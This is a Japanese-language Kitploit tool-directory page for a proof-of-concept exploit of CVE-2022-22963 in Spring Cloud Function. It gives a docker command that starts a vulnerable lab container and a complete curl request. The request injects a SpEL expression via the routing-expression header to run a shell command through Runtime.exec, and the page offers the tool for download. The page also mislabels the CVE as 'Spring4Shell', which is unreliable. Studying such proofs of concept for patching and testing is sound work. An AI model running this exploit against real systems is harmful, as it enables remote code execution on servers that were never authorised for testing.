Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22963 — CVE-2022-22963 (Spring4Shell) の概念実証エクスプロイト。脆弱なDockerコンテナと、Spring Cloud Functionのルーティング式を介したcurlベースのリモートコード実行を備えています。 | Kitploit
ツール/GitHubGitHub/darryk10/cve-2022-22963
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubdarryk10/cve-2022-22963

CVE-2022-22963

CVE-2022-22963 (Spring4Shell) の概念実証エクスプロイト。脆弱なDockerコンテナと、Spring Cloud Functionのルーティング式を介したcurlベースのリモートコード実行を備えています。

リポジトリを見る
341624年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-22963 - Spring4shell

脆弱なSpringBootアプリケーションを実行するには、このDockerコンテナをポート8080に公開して実行します。 例:

root@kitploit:~
docker run -it -d -p 8080:8080 bobcheat/springboot-public

エクスプロイト

curlコマンド:

root@kitploit:~
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

またはBurp Suiteを使用:

Burpsuite

クレジット

https://github.com/hktalent/spring-spel-0day-poc

ツールをダウンロード